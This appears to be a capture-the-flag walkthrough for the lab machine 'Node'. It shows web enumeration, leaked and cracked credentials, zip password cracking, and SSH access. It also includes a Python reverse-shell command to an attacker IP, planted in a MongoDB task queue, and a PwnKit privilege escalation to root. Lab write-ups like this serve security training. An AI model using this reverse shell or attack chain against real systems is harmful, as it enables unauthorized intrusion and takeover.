
Ping

Nmap Scans

mapit 10.10.10.58

Nmap Default Scan

Nmap Service and Script Scan

Nmap All Port Scan

On port 3000

Feroxbuster

feroxbuster --url https://10.10.10.58:3000 -k -o feroxbuster.txt

Can’t get any useful info

Will analyse the source code. There are a lot of JavaScript files; always look for sensitive info in .js files.

As guessed, we got some sensitive info from http://10.10.10.58:3000/assets/js/app/app.js

Will navigate to the page http://10.10.10.58:3000/partials/admin.html. We got something…!

But only admin user can download the file

Will enumerate more. More paths can be found in http://10.10.10.58:3000/assets/js/app/controllers/home.js; we can see /api/user/latest

This gives us info http://10.10.10.58:3000/api/users/

Cracked the hashes using CrackStation https://crackstation.net/. Three out of 4 hashes were cracked.

Credentials:
myP14ceAdm1nAcc0uNT:manchester
tom:spongebob
mark:snowflake

Will try these creds to log in, first with the admin cred. Worked…!

Will download and analyse the content

After analysing the content, it looks base64-encoded; will decode it

cat myplace.backup | base64 --decode > backup.decoded

I have opened the file, but it is in some unsupported format; will analyse the file type now

It is a zip file; will unzip it. It is asking for a password

Will find password

zip2john backup.decoded > backup.hash
john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash

Found it…! magicword

After unzipping, there is a new directory, var; will explore it. Found mark’s password: mark:5AYRft73VtFpc84k

Will SSH in now with mark’s creds

ssh mark@10.10.10.58

user.txt is in tom’s home directory, but we don’t have permission to read it

We can see pkexec among the SUID binaries

find / -perm -u=s -type f 2>/dev/null

pkexec version is vulnerable

pkexec --version

Using MongoDB to get access as user tom

mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
show collections           // list the collections (database tables)
db.tasks.find().pretty()   // list the contents of the tasks collection
db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})   // insert a reverse shell command into the tasks collection
WriteResult({ "nInserted" : 1 })

Will set up a Netcat listener

Using the vulnerable pkexec version, I have escalated my privileges to root

Used PwnKit

Root.txt

User.txt

Done with Node…:)